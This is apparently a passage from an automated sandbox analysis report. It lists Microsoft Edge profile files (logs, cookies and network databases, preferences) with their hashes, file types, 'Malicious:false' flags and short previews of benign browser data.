                                                                                                                                                                SHA-512:CCD28723CCA62FD6D94B3B8C04A77B9A184B3B0061F9FFA9CCC277FFE1102A4C48B55C51BAC3C5205F182D6624972E2B5CCBB88DDAE8961A677C99F3C8D4990F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):411
                                                                                                                                                                Entropy (8bit):5.287536196347891
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7sevLZYeb8rcHEZrELFUtn/H54ZYeb8rcHEZrEZSJ:7s8lYeb8nZrExgxoYeb8nZrEZe
                                                                                                                                                                MD5:4BBD7BD0E3FABBAE0FCA6A4988D83316
                                                                                                                                                                SHA1:C466512189828DCF3E9C1239BC4B3A6DD6264868
                                                                                                                                                                SHA-256:E311870854B567A4770CCDA4CB072335AF953A33F0352EB77CA2FE5B79BD4329
                                                                                                                                                                SHA-512:B6A7F43F2C7CDD2111411718D18AD742910722142B865AE83D3C29446623CF733EF8975F8A4946A8545B7BE7E2BAD355465B420B29C222A89159C0C9518F34E0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:31.690 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:31.691 680 Recovering log #3.2025/01/09-08:42:31.691 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):411
                                                                                                                                                                Entropy (8bit):5.287536196347891
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7sevLZYeb8rcHEZrELFUtn/H54ZYeb8rcHEZrEZSJ:7s8lYeb8nZrExgxoYeb8nZrEZe
                                                                                                                                                                MD5:4BBD7BD0E3FABBAE0FCA6A4988D83316
                                                                                                                                                                SHA1:C466512189828DCF3E9C1239BC4B3A6DD6264868
                                                                                                                                                                SHA-256:E311870854B567A4770CCDA4CB072335AF953A33F0352EB77CA2FE5B79BD4329
                                                                                                                                                                SHA-512:B6A7F43F2C7CDD2111411718D18AD742910722142B865AE83D3C29446623CF733EF8975F8A4946A8545B7BE7E2BAD355465B420B29C222A89159C0C9518F34E0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:31.690 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:31.691 680 Recovering log #3.2025/01/09-08:42:31.691 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1601
                                                                                                                                                                Entropy (8bit):5.590582661146252
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:dZuUUTK7XZTRV03Sx497AHHk2GJ348yls+yG:dMLTKjhBZdP8osY
                                                                                                                                                                MD5:D8DD5CC3E24D74F8BF1826D58B3237E3
                                                                                                                                                                SHA1:5E18E343DDB78E30F7891F5A81B18E6BFF6445A3
                                                                                                                                                                SHA-256:701BA7F1D4FE20AC28F983FB0CFAD3F0DA0557AF5D4CF1ABF446EABCB5B6B347
                                                                                                                                                                SHA-512:72F47BBC4D0D8C7E365EAA1FF9281811BD7CE187A8477E70438023437C788ECD8F986CEBC30BFCC2FD161FA128F9175FD7C24089D4A27FAC0CBD904AE16365AB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.D..:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":363}.!_https://ntp.msn.com..LastKnownPV..1736430156896.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430157996.._https://ntp.msn.com..MUID!.0E823CD872A76198161729B773BE609A.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430156974,"schedule":[21,36,-1,-1,-1,22,-1],"scheduleFixed":[21,36,-1,-1,-1,22,-1],"simpleSchedule":[38,14,16,46,13,30,9]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430156866.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):339
                                                                                                                                                                Entropy (8bit):5.170716885163237
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREV1yq2PcNwi23oH+Tcwt8a2jMGIFUtJvREKFZz1ZmwPvREvRkwOcNwi23oL:7mV1yvLZYeb8EFUtEc/SvR54ZYeb8bJ
                                                                                                                                                                MD5:E90D6E3DD70E2CABF1ED6BE5CBC2DDF5
                                                                                                                                                                SHA1:77CC6227E308F1CDF7A6DEEF875C01024AF0F97E
                                                                                                                                                                SHA-256:C0F0E486C2C98D455CC1352DEB2626EF3E09A055A007DBC420C3DCD6C1FF6132
                                                                                                                                                                SHA-512:5F15AEF324253075C04843C70D413813C8E97C6AAECA1BCED1BF1F0D368028014869DD42F82BA8D22C9A881E78286E988B3EF7AF3F1F556C71E00BA938D49285
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.211 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.212 770 Recovering log #3.2025/01/09-08:42:29.215 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):339
                                                                                                                                                                Entropy (8bit):5.170716885163237
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREV1yq2PcNwi23oH+Tcwt8a2jMGIFUtJvREKFZz1ZmwPvREvRkwOcNwi23oL:7mV1yvLZYeb8EFUtEc/SvR54ZYeb8bJ
                                                                                                                                                                MD5:E90D6E3DD70E2CABF1ED6BE5CBC2DDF5
                                                                                                                                                                SHA1:77CC6227E308F1CDF7A6DEEF875C01024AF0F97E
                                                                                                                                                                SHA-256:C0F0E486C2C98D455CC1352DEB2626EF3E09A055A007DBC420C3DCD6C1FF6132
                                                                                                                                                                SHA-512:5F15AEF324253075C04843C70D413813C8E97C6AAECA1BCED1BF1F0D368028014869DD42F82BA8D22C9A881E78286E988B3EF7AF3F1F556C71E00BA938D49285
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.211 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.212 770 Recovering log #3.2025/01/09-08:42:29.215 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4bcfecd9-2f31-4bca-bbc8-7ca2173145fb.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\638fefaa-0f77-4f22-9eee-b018c5c6aa93.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\77a61496-f3a5-474a-b2f1-5a05f4282522.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\78ba4e98-8b0f-4ac4-8c51-08ac8527efdb.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):2.812709303165155
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tTrAccFgbMKiadv9hDT2sN3jxGwFk3JkmPoVo9ZMGjMStokXhMHLW0c4p0L/ZJVb:V8NMTh5AwFq7P6S0lp0LhJVb
                                                                                                                                                                MD5:B04E9F8275793FB8FFE52F6E1F40BEF9
                                                                                                                                                                SHA1:2B17AA7E1B239D7FC67BAADC51477F0827337713
                                                                                                                                                                SHA-256:90C4CD006D52D73E0DDF8E594F71651E518C54E92D3BB0C9929FB397AFD41A80
                                                                                                                                                                SHA-512:D9E752F0AA28859CB7EC275D76FC685BD5B9816F3DC2774A8D4F1C9A5F7132CAF22F909140BD340DCA75653A6C4573FEAA6BD3A27625E2D90C808E0312719443
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                Entropy (8bit):1.3766839309333772
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cS2Wb:JkIEumQv8m1ccnvSfDHlGFh5d3Bw1a
                                                                                                                                                                MD5:FF32C5402FFD1390F21B19B9D501CF72
                                                                                                                                                                SHA1:26C39F966EA41A398EDDB58F0FB8FC810B66EAB1
                                                                                                                                                                SHA-256:08DCD239D4AB1AC5B3F2D347C24DA805E1D4579244F1E35C8A8AA4F00B34F093
                                                                                                                                                                SHA-512:72711A6A1FBA5A51E69BAED56CD7FCC64B0074EBC75F3ACAAF8D5D858DE45154E2780AAD9B05BE8353740FADCD4C90CF6148073AEBBA6D24A306B0C60330C527
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF335d6.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3806c.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38398.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ac26ebe6-2186-4fe1-bd29-9f4e18a573b1.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF36ee8.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3aae7.TMP (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
